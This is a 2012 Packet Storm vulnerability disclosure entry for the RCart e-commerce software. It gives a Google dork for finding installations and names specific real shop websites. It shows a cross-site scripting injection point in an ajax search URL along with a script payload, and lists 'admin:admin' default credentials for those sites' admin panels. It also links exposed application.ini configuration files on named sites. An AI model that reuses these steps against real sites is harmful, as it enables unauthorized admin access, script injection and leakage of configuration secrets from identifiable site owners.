RCart Cross Site Scripting / Admin Panel

2012-09-01T00:00:00
ID PACKETSTORM:116158
Type packetstorm
Reporter ruben_linux
Modified 2012-09-01T00:00:00

Description

                                        
                                            ` _ _ _  
_ __ _ _| |__ ___ _ __ | (_)_ __ _ ___ __  
| '__| | | | '_ \ / _ \ '_ \ | | | '_ \| | | \ \/ /  
| | | |_| | |_) | __/ | | | | | | | | | |_| |> <  
|_| \__,_|_.__/ \___|_| |_|___|_|_|_| |_|\__,_/_/\_\  
|_____|  
  
# Type: Xss & default admin panel  
#  
# Google Dork: "powered by rcart"  
#  
# Date: 1/9/12  
#  
# Author: ruben_linux  
#  
# Site : http://arealinux(dot)blogspot(dot)com(dot)es  
# http://www(dot)youtube(dot)com/user/rubenlinux  
==================================  
  
[+] http://www.emallhub.com/  
[+] http://www.jaya4tech.com  
  
http://www.jaya4tech.com/ajax/ajaxseachauto?format=json&q=[HEREXSS]&limit=10&timestamp=1346508322457  
http://www.emallhub.com/ajax/ajaxseachauto?format=json&q=[HEREXSS]&limit=10&timestamp=1346508394788  
  
<<script>alert(132);  
  
http://www.jaya4tech.com/admin~~~|  
|---->admin:admin  
http://www.emallhub.com/admin~~~~|  
  
Also:  
http://packetstormsecurity.org/files/115906/Zend-Framework-Information-Disclosure.html  
  
[+] http://www.lumbiniimports.com/application/configs/application.ini  
[+] http://www.emallhub.com/application/configs/application.ini  
[+] http://www.jaya4tech.com/application/configs/application.ini  
`